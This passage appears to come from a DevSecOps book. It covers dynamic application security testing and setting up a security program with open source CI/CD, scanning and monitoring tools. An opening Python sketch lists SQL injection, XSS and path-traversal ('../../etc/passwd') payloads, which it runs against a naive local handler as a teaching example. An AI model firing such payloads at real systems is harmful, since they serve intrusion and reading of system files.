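The input-validation item in the API checklist above boils down to sending known attack payloads and flagging any that come back reflected without sanitization. The following is a minimal sketch of that idea; `handle_request` is a stand-in for a real HTTP call to a staging endpoint (for example, via the `requests` library), and its name and behavior are illustrative assumptions.

```python
# Minimal sketch: probe a handler with attack payloads and flag verbatim reflection.
PAYLOADS = {
    "sql_injection": "' OR '1'='1' --",
    "xss": "<script>alert(1)</script>",
    "path_traversal": "../../etc/passwd",
}

def handle_request(user_input: str) -> str:
    # Deliberately naive echo endpoint, used here only to exercise the check.
    return f"<p>You searched for: {user_input}</p>"

def probe(handler):
    """Return the names of payloads the handler reflects verbatim."""
    findings = []
    for name, payload in PAYLOADS.items():
        if payload in handler(payload):  # reflected as-is: likely no output encoding
            findings.append(name)
    return findings

print(probe(handle_request))  # ['sql_injection', 'xss', 'path_traversal']
```

A reflected payload is only an indicator, not proof of exploitability; DAST tools layer many such checks and then attempt confirmation before reporting a finding.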

Choosing the right DAST tool

Choosing the right DAST tool is the first and most important step in setting up a DAST environment. Many DAST tools are available in the market, and choosing the right one can be daunting. The choice of tool will depend on various factors, such as cost, ease of use, features, and the type of web application being tested. Some popular DAST tools include Burp Suite, OWASP ZAP, Acunetix, and Netsparker. When selecting a DAST tool, consider the following factors:

• Support for the programming language and frameworks used in the web application
• Ease of use and customization


Dynamic Application Security Testing (DAST)

• Reporting and analysis capabilities
• Integration with other security tools and workflows
• Licensing and cost

Setting up the testing environment

Before you can start DAST testing, it is essential to set up the testing environment to ensure accurate and effective testing. The following are the steps for setting up a testing environment:

1. Identify the target web application(s) that need to be tested.
2. Clone the web application(s) onto a test server or virtual machine.
3. Configure the web application(s) to use a test database to avoid any impact on the production environment.
4. Install and configure any necessary dependencies and libraries.
5. Ensure that the web application(s) are accessible from the DAST tool.
6. Configure the DAST tool to scan the application and report results.

How to perform a DAST scan in an organization

To perform a DAST scan in an organization, you should first select a DAST tool that’s suitable for the specific application type. With that tool in hand, the next step involves setting up a controlled environment that mirrors the production system to ensure no disruptions occur during testing. It’s essential to configure the DAST tool based on the organization’s needs, ensuring it understands the application’s structure and scope. Once set up, initiate the scan, allowing the tool to actively probe the application for vulnerabilities. Upon completion, review the results, paying close attention to potential false positives. Prioritize the identified vulnerabilities based on their severity and potential impact, then collaborate with development teams to patch the flaws. Lastly, re-scan the application post-remediation to confirm that the identified vulnerabilities have been addressed. Let’s take a closer look at this:

• Setting up a DAST environment: DAST is a critical component of modern web application security. It allows organizations to test the security of their web applications by simulating attacks against them in a controlled environment. Setting up a DAST environment involves selecting the right tool, configuring it for optimal performance, and setting up the testing environment:

‚ Choose a suitable environment: To effectively run DAST, choose an environment that closely mirrors your production environment. This will help you identify security vulnerabilities that may be present in the live system. The environment should include the application, its dependencies, and any related infrastructure components (such as databases, web servers, and APIs).


‚ Isolate the testing environment: It is essential to isolate the testing environment from the production environment to avoid any accidental harm or data leakage. Create separate networks, access controls, and user accounts for the testing environment.
‚ Prepare test data: Prepare realistic test data that resembles production data but without sensitive information. The test data should cover various data types, input fields, and possible user interactions.

• Configuring the DAST tool: Once the testing environment has been set up, the DAST tool must be configured for optimal performance. This includes setting up the scan policies and authentication, and configuring any custom plugins that may be required. The scan policies determine the scope of the testing and the types of vulnerabilities that the tool will look for. Authentication is required to ensure that the tool can access all the parts of the application that require testing.

• Running the scan: After the DAST tool has been configured, it is time to run the scan. It is important to ensure that the scan is run with the appropriate settings and configurations. The scan should cover all parts of the application that are in scope, and the tool should be allowed to run for a sufficient amount of time to ensure that it can detect all possible vulnerabilities.

• Analyzing the results: After the scan is complete, the results need to be analyzed. The DAST tool will generate a report listing all the detected vulnerabilities. It is important to review the report carefully to understand the severity of each vulnerability and prioritize them based on their impact on the application. Once the vulnerabilities have been prioritized, they can be addressed and fixed.

In short, setting up a DAST environment involves choosing the right DAST tool, setting up the testing environment, configuring the tool for optimal performance, running the scan, and analyzing the results. Each of these steps is important to ensure that the DAST tool can detect all possible vulnerabilities in the web application.
• Understanding false positives and false negatives: A false positive is a finding the tool reports that is not a real vulnerability, while a false negative is a real vulnerability the tool fails to detect. Review DAST findings manually to weed out false positives, and combine DAST with other testing methods to reduce the chance of false negatives.
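The analysis step above can be sketched in code: filter out confirmed false positives, then order the remaining findings most-severe first. The report structure here (dicts with `name`, `severity`, and `false_positive` keys) is a simplified, hypothetical format; real tools such as OWASP ZAP export far richer reports.

```python
# Sketch: triage DAST findings by severity, dropping confirmed false positives.
SEVERITY_RANK = {"critical": 0, "high": 1, "medium": 2, "low": 3, "informational": 4}

def triage(findings):
    """Drop confirmed false positives and order the rest most-severe first."""
    real = [f for f in findings if not f.get("false_positive", False)]
    return sorted(real, key=lambda f: SEVERITY_RANK[f["severity"]])

report = [
    {"name": "Missing security header", "severity": "low"},
    {"name": "SQL injection in /search", "severity": "high"},
    {"name": "XSS in /profile", "severity": "medium", "false_positive": True},
]

for finding in triage(report):
    print(finding["severity"], finding["name"])
```

Encoding the severity ordering in one place keeps the triage rule consistent across scans and makes it easy to adjust when the organization changes its risk ranking.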

Integrating DAST with other security tools

Integrating DAST with other security tools is essential to ensure comprehensive application security. In this section, I will cover the benefits of using DAST with other security testing tools, incorporating DAST into DevOps processes, and analyzing and correlating DAST results with other security data sources.

DAST is one of several security testing tools that can be used to identify vulnerabilities in applications. By combining DAST with other testing tools, such as SAST, manual testing, and penetration testing, organizations can improve the accuracy and effectiveness of their security testing program:

• SAST: SAST focuses on analyzing an application’s source code, bytecode, or binary code for potential vulnerabilities. Combining SAST and DAST can help identify vulnerabilities that might be missed by either technique alone.


• IAST: IAST combines aspects of both SAST and DAST by monitoring an application’s behavior during runtime and analyzing its code. Using DAST with IAST can improve the accuracy of vulnerability detection.
• Runtime application self-protection (RASP): RASP is a security technology that monitors an application during runtime to identify and block potential attacks. Integrating DAST with RASP can help with identifying vulnerabilities and protecting your application in real time.

Incorporating DAST into DevOps processes

DevOps processes are designed to enable organizations to develop, deploy, and maintain applications quickly and efficiently. By incorporating DAST into DevOps processes, organizations can ensure that security is integrated into the entire application development life cycle. This can be achieved by including DAST as part of the automated testing process and integrating DAST results into the CI/CD pipeline.

Analyzing and correlating DAST results with other security data sources

DAST results can provide valuable insights into the security of an application. By analyzing and correlating DAST results with other security data sources, such as network traffic logs, system logs, and vulnerability scanners, organizations can gain a more comprehensive understanding of the security posture of their applications. This can help with identifying trends and patterns that indicate potential security risks, enabling organizations to address them proactively:

• SIEM systems: Integrate DAST results with your SIEM system to correlate vulnerability data with other security events, helping to prioritize and address the most critical issues
• Vulnerability management platforms: Import DAST results into a vulnerability management platform to manage and track the progress of vulnerability remediation efforts
• Threat intelligence: Combine DAST results with threat intelligence data to better understand the potential impact of identified vulnerabilities and assess the risk they pose to your organization

By using DAST in combination with other testing tools, incorporating DAST into DevOps processes, and analyzing and correlating DAST results with other security data sources, organizations can improve the accuracy and effectiveness of their security testing program and ensure that security is integrated into the entire application development life cycle.
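A tiny sketch of this correlation idea: join DAST findings with web server log entries by URL path, to see whether a flagged endpoint is also receiving live traffic (a rough proxy for exposure). The field names (`path`, `status`) are assumptions chosen for illustration, not the schema of any particular tool.

```python
# Sketch: correlate vulnerable paths from a DAST report with request counts from logs.
dast_findings = [
    {"path": "/search", "issue": "SQL injection"},
    {"path": "/profile", "issue": "Reflected XSS"},
]

access_log = [
    {"path": "/search", "status": 500},
    {"path": "/search", "status": 200},
    {"path": "/healthz", "status": 200},
]

def correlate(findings, log):
    """Map each vulnerable path to the number of requests it received."""
    hits = {}
    for entry in log:
        hits[entry["path"]] = hits.get(entry["path"], 0) + 1
    return {f["path"]: hits.get(f["path"], 0) for f in findings}

print(correlate(dast_findings, access_log))  # {'/search': 2, '/profile': 0}
```

In practice a SIEM performs this kind of join at scale, but the principle is the same: a high-severity finding on a heavily trafficked endpoint deserves attention first.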

DAST reporting and remediation

Generating DAST reports is a critical component of any DAST testing program. In this section, I will cover the importance of identifying vulnerabilities early in the development process, prioritizing and remediating vulnerabilities, verifying remediation, and retesting to ensure that the application is secure.


Generating DAST reports

• Execute scans: Run DAST scans as part of your development process or on a regular schedule. Cover the entire application, including its dependencies and all relevant components.
• Compile results: Aggregate the results of the DAST scans to generate a comprehensive report. Include information such as the vulnerability type, severity, location, and a description of the potential impact.
• Review and validate findings: Manually review the DAST report to validate the findings, as automated scans may generate false positives or negatives. Make sure you address any discrepancies before proceeding.
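The "compile results" step above amounts to aggregating raw findings from several scans into summary figures for the report. The input shape below is a simplified assumption; real scan exports carry far more detail per finding.

```python
# Sketch: aggregate findings from multiple scans into severity counts.
from collections import Counter

scan_results = [
    {"scan": "2024-01-10", "severity": "high"},
    {"scan": "2024-01-10", "severity": "low"},
    {"scan": "2024-01-17", "severity": "high"},
]

def summarize(findings):
    """Count findings by severity across all scans."""
    return dict(Counter(f["severity"] for f in findings))

print(summarize(scan_results))
```

Tracking these counts from cycle to cycle gives stakeholders a simple trend line for the application's security posture.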

Identifying vulnerabilities early in the development process

Identifying vulnerabilities early in the development process is crucial to ensure that they can be remediated before the application is released to production. DAST testing should be performed early in the development process, as part of the testing process for each new release or feature. This will enable developers to address vulnerabilities promptly, reducing the risk of a security breach and minimizing the cost of remediation:

• Shift-left approach: Integrate DAST into your development process by including it in your CI/CD pipeline. This helps identify vulnerabilities early in the development life cycle, allowing for faster remediation.
• Collaborative environment: Encourage collaboration between development, security, and operations teams to ensure that security concerns are addressed throughout the development life cycle.

Prioritizing and remediating vulnerabilities

Once vulnerabilities have been identified, they should be prioritized based on their severity and the potential impact on the application. High-severity vulnerabilities should be remediated first, followed by medium- and low-severity vulnerabilities. The remediation process should be documented, and progress should be tracked to ensure that all vulnerabilities are addressed.

Verifying remediation

After the vulnerabilities have been remediated, it is important to verify that the remediation has been effective. This can be done through manual testing or with the help of automated tools. Once the remediation process has been verified, the application can move on to the next stage of the development process:

• Verify fixes: Once a vulnerability has been remediated, verify that the issue has been resolved by reviewing the changes in the application’s code or configuration.


• Retest: Perform follow-up DAST scans to confirm that the vulnerabilities have been effectively addressed. Retesting helps ensure that no new vulnerabilities have been introduced during the remediation process.
• Update reports: Update your DAST reports to reflect the current state of the application’s security posture. Maintain a history of past reports to track improvements and changes over time.

Retesting

Retesting is essential to ensure that the application is secure and free from vulnerabilities. Once the remediation process has been verified, the application should be retested using DAST and other testing tools to ensure that no new vulnerabilities have been introduced. Retesting should be performed as part of the testing process for each new release or feature.

Generating DAST reports

DAST reports should be generated after each testing cycle to document the vulnerabilities that were identified, the severity of each vulnerability, and the status of the remediation efforts. These reports should be shared with the development team and other stakeholders to ensure that everyone is aware of the security posture of the application and the progress of the remediation efforts.

In conclusion, generating DAST reports is an important component of any DAST testing program. By identifying vulnerabilities early in the development process, prioritizing and remediating them, verifying remediation, and retesting, organizations can ensure that their applications remain secure and free from vulnerabilities.

Comparing DAST with other security testing approaches

There are several different approaches to application security testing, each with its strengths and weaknesses. In this section, we’ll compare DAST with other security testing approaches.

SAST

SAST is the process of analyzing the application’s source code to identify security vulnerabilities. Unlike DAST, which tests the application in a running state, SAST examines the application’s code and can detect vulnerabilities that may not be visible during runtime. However, SAST is limited by its inability to detect vulnerabilities that arise from user input or environmental factors.

IAST

IAST utilizes and combines the best features of SAST and DAST. IAST monitors the application during runtime and analyzes its behavior to detect vulnerabilities in real time. It also examines the application’s source code to detect vulnerabilities that may not be visible during runtime. However, IAST can be complex to set up and may require making modifications to the application code.

RASP

RASP is a security approach that uses runtime monitoring and automated protection mechanisms to detect and prevent attacks in real time. RASP integrates with the application and can detect vulnerabilities that other testing approaches may miss. However, RASP may be limited by its inability to detect vulnerabilities before an attack occurs.

Each security testing approach has its benefits and drawbacks, and a comprehensive application security program should use a combination of these approaches to identify and mitigate security risks. DAST is particularly useful for identifying vulnerabilities that arise from user input and environmental factors and can be a valuable component of an overall security testing strategy.

The future of DAST

The future of DAST is promising, with emerging trends in technology and advancements in artificial intelligence and machine learning that are likely to impact the cybersecurity industry significantly. Let’s take a closer look:

• Emerging trends in DAST technology: DAST tools are becoming more sophisticated and are incorporating new features, such as machine learning and artificial intelligence, to improve their effectiveness. Some DAST tools can now identify vulnerabilities automatically and suggest remediation actions, reducing the time and effort required for manual analysis. Additionally, DAST tools are becoming more integrated with other security testing approaches, such as SAST and IAST, to provide a more comprehensive testing solution.
• Advancements in artificial intelligence and machine learning: Artificial intelligence and machine learning are becoming increasingly important in cybersecurity, and DAST is no exception. These technologies can improve vulnerability detection accuracy, reduce false positives, and speed up the remediation process. Machine learning algorithms can also learn from previous testing results to improve the testing process and identify new vulnerabilities that may not have been previously detected.
• The potential impact of DAST on the cybersecurity industry: DAST is already a valuable tool in the cybersecurity industry, and its importance is likely to increase in the coming years. As the number of web applications grows, effective application security testing solutions will become more critical. DAST can help organizations identify vulnerabilities in real time and proactively address them, reducing the risk of data breaches and other cyberattacks. Additionally, as the regulatory landscape continues to evolve, compliance requirements will likely increase, and DAST can help organizations meet these requirements.


DAST will likely remain a critical component of the cybersecurity industry in the coming years. Its continued development and integration with other technologies will improve its effectiveness and help organizations avoid emerging threats.

Summary

DAST is crucial to any comprehensive application security program. DAST tools simulate attacks against web applications to identify vulnerabilities and weaknesses that attackers can exploit. Let’s recap the DAST concepts and best practices:

• Set up a suitable, isolated testing environment that closely mirrors your production environment
• Choose the right DAST tool based on your application’s architecture, technology stack, and specific security concerns
• Configure the DAST tool for optimal performance by customizing scan policies, setting up authentication and authorization, and integrating with CI/CD pipelines
• Monitor and analyze the results to address identified vulnerabilities and track the progress of your security efforts

It is important to note that ongoing application security testing is essential to ensure that web applications are secure and free from vulnerabilities. DAST should be performed regularly and as part of a broader security testing program that includes other types of testing, such as SAST and manual testing.

In today’s world, where cyber threats are becoming increasingly sophisticated and frequent, organizations must implement DAST as part of their security strategy. DAST can help identify vulnerabilities before attackers can exploit them, minimizing the risk of a security breach and the associated financial and reputational damage. By taking proactive measures to secure their web applications, organizations can ensure the safety of their customers’ data and protect their business operations. We will cover this in more detail in the next chapter.

Part 4: Tools

Tools help in the execution of an effective DevSecOps program. This section covers tools and tips to set up an effective DevSecOps program, covering it from all angles. This part has the following chapter:

• Chapter 12, Setting Up a DevSecOps Program with Open Source Tools

12

Setting Up a DevSecOps Program with Open Source Tools

Creating a DevSecOps program using open source tools can be a cost-effective solution for many organizations. It requires a combination of practices, tools, and cultural philosophies to ensure security is integrated into the development life cycle. In this process, remember to continuously review and update your DevSecOps program to keep up with evolving security threats and to adopt new and improved open source tools as they become available.

We can approach setting up a DevSecOps program with open source tools by following these steps. This is an exhaustive list of things that can be covered as part of setting up a DevSecOps program:

• Culture and training: Foster a culture of shared responsibility for security across your development, security, and operations teams. Conduct ongoing training to ensure all team members have the requisite knowledge to contribute to security.
• Version control: Adopt version control systems such as Git to track changes and ensure a collaborative environment for code development.
• Continuous integration (CI): Implement CI systems such as Jenkins, CircleCI, or GitHub Actions to automate the integration of code changes from multiple contributors. Integrate security scans into your CI pipeline using open source tools such as OWASP Dependency-Check for checking third-party dependencies for vulnerabilities.
• Continuous deployment (CD): Implement CD tools such as Jenkins or Spinnaker to automate the deployment of applications. Include automated security checks in your deployment pipeline, such as configuration scanning and security testing.


• Infrastructure as Code (IaC): Use IaC tools such as Terraform or Ansible to manage your infrastructure, ensuring that it is defined and managed through code. Apply security best practices to your IaC configurations and use open source tools such as Checkov or Terrascan to scan for misconfigurations.
• Container and orchestration security: If you are using containers, employ tools such as Docker Swarm and Kubernetes for orchestration. Use open source security tools such as Trivy or Clair for container scanning and kube-bench or kube-hunter for Kubernetes security assessments.
• Monitoring and logging: Implement centralized logging and monitoring using open source tools such as the ELK Stack (Elasticsearch, Logstash, Kibana) or Prometheus and Grafana.
• Incident response: Establish an incident response plan and procedures. Use open source tools such as TheHive or Wazuh for incident management and orchestration.
• Compliance and auditing: Ensure that your DevSecOps processes and tools comply with relevant industry standards and regulations. Utilize open source auditing and compliance tools such as OpenSCAP or InSpec.
• Feedback loop: Establish a feedback loop to ensure that lessons learned from security incidents are integrated back into the DevSecOps process, helping to continuously improve your security posture.

In this chapter, we will cover these aspects in the following topics:

• Techniques used in setting up the program
• Setting up the CI/CD pipeline
• Implementing security controls
• Managing DevSecOps in production
• The benefits of the program

Techniques used in setting up the program

Let’s begin by understanding the techniques that can be used to set up the program, starting with DevSecOps itself.

Understanding DevSecOps

DevSecOps expands on the mindset established by DevOps, which is a set of cultural philosophies, practices, and tools that encourage faster and more agile software development through collaboration between development and operations teams.


The adoption of a DevSecOps culture requires a holistic approach and a commitment to continuous improvement to ensure that security is integrated effectively into the development life cycle, ultimately leading to more secure and reliable software delivery. At its core, DevSecOps means integrating security into every step of the development process. It’s a cultural shift, ensuring that security is everyone’s responsibility. Let’s dive deeper into DevSecOps.

Cultural shift

DevSecOps fosters a culture where security is not seen as someone else’s job, but as a shared responsibility. Every member of the team, whether they’re a developer, tester, or operations personnel, is accountable for the security of the application. Unlike traditional models, where security was often considered at the later stages of development, DevSecOps ensures that security is a consideration from the get-go, starting with the initial design phase.

Practical implementation

DevSecOps emphasizes the automation of security processes to identify and fix security issues faster and earlier in the development life cycle. This includes automated security testing, vulnerability scanning, and automated deployments with built-in security checks. It also encourages continuous monitoring and logging to provide visibility into the security posture of applications and infrastructure, making it easier to detect and respond to security incidents.

Tooling

Utilize tools that can integrate with development, deployment, and monitoring platforms to provide continuous feedback on the security posture of applications. As discussed earlier, there are numerous open source tools available that can be employed to implement various aspects of a DevSecOps program.

Benefits

By integrating security checks early and throughout the development life cycle, teams can detect and remediate security issues much earlier than in traditional models. Faster feedback and automated processes reduce the time required to remediate vulnerabilities and security issues. Continuous monitoring and auditing help in maintaining compliance with security standards and regulations.


Challenges

There might be resistance initially, as this approach requires a change in mindset and practices across different teams. Team members may need to learn new skills and tools to effectively contribute to the security aspects of the DevSecOps pipeline.

Continuous improvement

Establishing feedback loops to learn from security incidents and continuously improving security practices is crucial for the success of a DevSecOps program.

Setting up the CI/CD pipeline

Use Jenkins or GitLab CI/CD as your CI/CD tool. These are popular open source tools that can automate the process of building, testing, and deploying your applications. Here are the stages where these tools can help:

• Source code management: Git is the most commonly used open source tool. Platforms such as GitHub and GitLab provide added features such as pull requests, issues, and CI/CD integrations.
• Static Application Security Testing (SAST): Use tools such as Brakeman (Ruby on Rails), Bandit (Python), or SonarQube to detect vulnerabilities in your source code.
• Dynamic Application Security Testing (DAST): Tools such as OWASP ZAP or Arachni can identify vulnerabilities at runtime by scanning your running application.
• Container security: If you’re using Docker, tools such as Clair, Anchore, or Trivy can scan your containers for known vulnerabilities.
• Dependency scanning: Check for vulnerabilities in your project’s dependencies using tools such as OWASP Dependency-Check or Snyk.
• IaC security: If you use Terraform, CloudFormation, or similar tools, check out tools such as Checkov or KICS to scan for misconfigurations.
• Secrets management: Avoid hardcoding secrets in your code. Use tools such as Vault by HashiCorp for managing secrets.
• Compliance as code: Use tools such as Open Policy Agent (OPA) to enforce policies across your stack.


The technicalities of setting up a CI/CD pipeline

Let’s get into the technical details of how the tools can be set up when using CI/CD.

Pre-setup

• Version control setup: Ensure you have a version control system in place, such as Git, and that your code is hosted on a platform such as GitHub, GitLab, or Bitbucket.
• Infrastructure preparation: Prepare the infrastructure where your application will be deployed. This could be on-premises servers or a cloud platform such as AWS, Azure, or GCP.
• Access controls: Set up the necessary access controls and permissions for your CI/CD tools and target environments to ensure security.

Option 1 – Jenkins

• Installation and configuration:

‚ Install Jenkins on a server
‚ Configure Jenkins, adding the necessary plugins, setting up executors, and defining environment variables

• Pipeline creation:

‚ Create a Jenkinsfile that defines your pipeline stages, such as build, test, and deploy
‚ Set up webhook triggers from your version control system to initiate the pipeline on code changes

• Security integration:

‚ Integrate security scanning tools into your pipeline stages to ensure code and dependencies are scanned for vulnerabilities
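To make the pipeline-creation step concrete, a declarative Jenkinsfile might look like the following hypothetical sketch. The stage contents, make targets, image name, and scanner invocations (dependency-check, trivy) are placeholders showing the shape of a pipeline with a security stage, not a prescribed configuration.

```groovy
// Hypothetical Jenkinsfile sketch; commands and image names are placeholders.
pipeline {
    agent any
    stages {
        stage('Build') {
            steps { sh 'make build' }
        }
        stage('Test') {
            steps { sh 'make test' }
        }
        stage('Security Scan') {
            steps {
                // Illustrative scanner invocations; adjust to your tooling
                sh 'dependency-check --scan . --out reports/'
                sh 'trivy image myapp:latest'
            }
        }
        stage('Deploy') {
            steps { sh 'make deploy' }
        }
    }
}
```

Keeping the security stage between test and deploy means a failed scan blocks the release, which is the fail-fast behavior DevSecOps aims for.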

Option 2 – GitLab CI/CD

• CI/CD configuration:

‚ In your project repository in GitLab, create a .gitlab-ci.yml file that defines the pipeline stages
‚ Utilize the integrated CI/CD feature of GitLab to set up your pipelines

• Security integration:

‚ Utilize GitLab’s built-in security features or integrate external security scanning tools in your pipeline stages
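As a sketch of what such a .gitlab-ci.yml might contain, the fragment below adds a security stage alongside tests. The job names, Docker image tags, and the staging URL are assumptions for illustration; verify the images and commands against the tools you actually adopt.

```yaml
# Hypothetical .gitlab-ci.yml sketch; images, commands, and URLs are placeholders.
stages:
  - test
  - security

unit_tests:
  stage: test
  script:
    - make test

dependency_scan:
  stage: security
  image: owasp/dependency-check
  script:
    - dependency-check --scan . --format JSON --out reports/

dast_baseline:
  stage: security
  image: owasp/zap2docker-stable
  script:
    - zap-baseline.py -t https://staging.example.com -r zap-report.html
  artifacts:
    paths:
      - zap-report.html
```

Publishing the scan report as a pipeline artifact makes the findings visible to reviewers directly from the merge request.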


Option 3 – Travis CI

• CI/CD configuration:

‚ In your project repository on GitHub, create a .travis.yml file that defines the pipeline stages
‚ Configure Travis CI through its web UI to set up your pipelines

• Security integration:

‚ Integrate security scanning tools into your pipeline stages to ensure code and dependencies are scanned for vulnerabilities
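A minimal .travis.yml along these lines might look like the following sketch, here assuming a Python project with Bandit as the SAST step; the language version, commands, and source path are illustrative.

```yaml
# Hypothetical .travis.yml sketch for a Python project; commands are placeholders.
language: python
python:
  - "3.10"
install:
  - pip install -r requirements.txt
  - pip install bandit
script:
  - make test
  - bandit -r src/   # SAST scan of the source tree
```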

Implementing security controls

DevSecOps programs ensure a proactive approach to security, making applications more resilient to attacks and ensuring compliance with industry standards and regulations. Let’s understand how implementing security controls can help in the context of DevSecOps:

• Early detection: Catching vulnerabilities early reduces the cost and complexity of remediation
• Continuous security: With security integrated at every step, the application is continuously checked for vulnerabilities, ensuring a robust security posture
• Shared responsibility: Security becomes everyone’s responsibility, not just a siloed task for a security team
• Source code repository: Use pre-commit or pre-receive hooks to enforce certain security checks even before the code is pushed:

‚ CI/CD pipeline integration: Help in automating the different phases and connecting the relevant tools.
‚ Build stage: Check dependencies for vulnerabilities.
‚ Test stage: Run SAST and DAST tools to identify potential vulnerabilities.
‚ Deployment stage: Ensure that configurations are checked before they’re deployed. Also, ensure secrets are securely managed and not hardcoded.

• Feedback loop: Integrate tools with communication platforms (for example, Slack and Microsoft Teams) to notify developers immediately about identified vulnerabilities
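A toy example of the kind of check a pre-commit hook might run is scanning text for patterns that look like hardcoded secrets. The two patterns below are illustrative only; real hooks typically call dedicated tools such as gitleaks or detect-secrets rather than hand-rolled regexes.

```python
# Minimal secret-pattern check of the kind a pre-commit hook might run.
import re

SECRET_PATTERNS = [
    re.compile(r"AKIA[0-9A-Z]{16}"),  # shape of an AWS access key ID
    re.compile(r"(?i)(password|secret)\s*=\s*[\"'][^\"']+[\"']"),
]

def looks_like_secret(text: str) -> bool:
    """Return True if the text appears to contain a hardcoded secret."""
    return any(p.search(text) for p in SECRET_PATTERNS)

print(looks_like_secret('db_password = "hunter2"'))               # True
print(looks_like_secret('password = os.environ["DB_PASSWORD"]'))  # False
```

Wired into a pre-commit hook, a check like this rejects the commit before the secret ever reaches the shared repository, which is far cheaper than rotating credentials after a leak.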

Identifying open source security tools

Identifying the right toolset is essential for a DevSecOps program to run properly and find the right set of vulnerabilities in the environment. The following are some of the tools that can be leveraged to test for security-related vulnerabilities or risks:
• Vulnerability scanning:
‚ SAST: Tools such as Bandit (for Python) and Brakeman (for Ruby on Rails) analyze code for known patterns of vulnerabilities
‚ DAST: Tools such as OWASP ZAP and Arachni find vulnerabilities by actively probing running applications
‚ Dependency scanning: Tools such as OWASP Dependency-Check and Snyk check your third-party dependencies for known vulnerabilities
• Configuration management:
‚ IaC scanners: Tools such as Checkov and Terrascan analyze IaC scripts for misconfigurations
‚ Container scanners: Tools such as Trivy, Clair, and Anchore scan Docker images for vulnerabilities
‚ Orchestration scanners: Tools such as kube-bench and kube-hunter assess Kubernetes clusters for misconfigurations and vulnerabilities
• Secrets management: Tools such as HashiCorp Vault manage and protect sensitive data, ensuring secrets aren’t hardcoded or exposed
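To illustrate what dependency scanning boils down to, here is a toy audit; the advisory map and package names are invented for the example, whereas real tools such as OWASP Dependency-Check or Snyk pull curated vulnerability feeds:

```python
# Toy dependency audit: compare pinned requirements against a
# hand-maintained advisory map. The data below is illustrative only.
KNOWN_VULNERABLE = {
    # package name -> set of affected versions (hypothetical entries)
    "examplelib": {"1.0.0", "1.0.1"},
}

def parse_requirements(lines):
    """Parse 'name==version' pins, ignoring comments, blanks, and ranges."""
    pins = {}
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#") or "==" not in line:
            continue
        name, version = line.split("==", 1)
        pins[name.strip().lower()] = version.strip()
    return pins

def audit(lines):
    """Return (package, version) pairs that match a known advisory."""
    pins = parse_requirements(lines)
    return [
        (name, version)
        for name, version in pins.items()
        if version in KNOWN_VULNERABLE.get(name, set())
    ]
```

A CI job running this kind of check can fail the build whenever audit() returns a non-empty list, which is exactly the behavior the real scanners automate at scale.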

Implementing security policies and procedures

Clearly outline what is acceptable in terms of security. This can include password policies, coding standards related to security, and acceptable use policies:
• Incident response plan: Have a clear and documented plan for when (not if) a security incident occurs. This includes identification, containment, eradication, recovery, and lessons learned phases.
• Regular audits: Regularly check and ensure that all security measures are being followed and are effective. This can be done through internal audits or third-party security assessments.
• Training and awareness: Conduct regular security training and awareness programs to ensure that every team member is up to date with the latest security practices and threats.
• Continuous improvement: Security is an ever-evolving field. Regularly review and improve your policies and procedures based on new threats, technologies, and business needs.

Managing DevSecOps in production

DevSecOps in production involves not just deploying code but ensuring that the entire pipeline and the running applications remain secure and compliant, and are continuously monitored for any potential threats or vulnerabilities. Security controls ensure that measures are in place to counteract vulnerabilities. By carefully managing DevSecOps in production, organizations can ensure that their applications remain secure, compliant, and resilient against potential threats. This requires proactive monitoring, adherence to compliance standards, and a reactive plan for when things go wrong. Let’s break this down step by step.

Monitoring and managing the DevSecOps pipeline in production
• Pipeline monitoring: Keep an eye on the CI/CD pipeline itself to ensure that all security checks are being executed, and no step is bypassed
• Runtime monitoring: Continuously monitor the application in production for abnormal behavior or unauthorized access
• Feedback loops: Ensure a mechanism is in place for developers and operations teams to receive immediate feedback on the build and security status

Using open source tools for monitoring, logging, and alerting
• Monitoring:
‚ Prometheus: An open source system monitoring and alerting toolkit
‚ Grafana: An open source platform for monitoring and observability, often used with Prometheus
• Logging:
‚ ELK Stack: A popular open source stack for searching, analyzing, and visualizing log data in real time
‚ Graylog: A powerful open source log management platform
• Alerting:
‚ ElastAlert: Easy and flexible alerting for Elasticsearch
‚ Alertmanager: Handles alerts sent by client applications such as the Prometheus server
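As one concrete example of alerting wired to monitoring, a Prometheus rule file might look like the following; the metric name, threshold, and labels are placeholders for your own instrumentation, not standard metrics:

```yaml
# Illustrative Prometheus alerting rule. Alerts that fire here are
# routed to Alertmanager, which handles notification and deduplication.
groups:
  - name: app-security
    rules:
      - alert: HighAuthFailureRate
        expr: rate(login_failures_total[5m]) > 5
        for: 10m
        labels:
          severity: warning
        annotations:
          summary: "Unusual rate of failed logins"
          description: "More than 5 failed logins/s sustained for 10 minutes; possible brute-force attempt."
```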

Incorporating continuous compliance and auditing into the pipeline
• Automated compliance checks: Integrate tools that can automatically check for compliance as code moves through the pipeline
• Open source compliance tools:
‚ OpenSCAP: Provides multiple tools to assist administrators and auditors with assessing, measuring, and enforcing security baselines
‚ InSpec: An open source testing framework that checks deployed infrastructures for compliance
• Regular audits: Periodically perform security and compliance audits to ensure that the production environment adheres to required standards and policies
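A minimal sketch of an automated compliance check, here applied to a Dockerfile baseline; the two rules are toy stand-ins for the policy libraries that tools such as Checkov or OpenSCAP ship with:

```python
# Tiny policy-as-code sketch: check a Dockerfile against two baseline
# rules (run as non-root, pin the base image). Real pipelines would use
# a dedicated tool; these rules are deliberately minimal.
def check_dockerfile(text: str) -> list[str]:
    """Return a list of human-readable policy violations."""
    violations = []
    lines = [line.strip() for line in text.splitlines() if line.strip()]
    # Rule 1: a USER instruction must be present, else the container runs as root
    if not any(line.upper().startswith("USER ") for line in lines):
        violations.append("no USER instruction: container runs as root")
    # Rule 2: base images must be pinned, not ':latest'
    for line in lines:
        if line.upper().startswith("FROM ") and line.endswith(":latest"):
            violations.append(f"unpinned base image: {line}")
    return violations
```

Run on every commit, a check like this turns the compliance baseline into a gate rather than a document that drifts out of date.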

Managing incidents and responding to security breaches
• Incident response plan: This should be a well-documented and practiced plan detailing the steps to take when a security incident occurs
• Open source incident management tools:
‚ TheHive: A scalable, open source, and free security incident response platform
‚ Wazuh: This tool provides host-based security information and event management (HIDS, HIPS, log analysis, and more)
• Communication: Have a clear communication plan to notify stakeholders, customers, or regulatory bodies if needed
• Post-incident analysis: After resolving an incident, always conduct a post-mortem analysis to understand the root cause and improve the system to prevent similar incidents in the future

The benefits of the program

A DevSecOps program is beneficial not only for creating a secure software development and deployment process but also for fostering a security-centric organizational culture. This can lead to better product quality, increased trust from customers and stakeholders, and a more resilient digital infrastructure. It merges the principles of DevOps with security, ensuring that security is an integral part of the development and deployment processes. Implementing a DevSecOps program can offer a wide range of benefits:
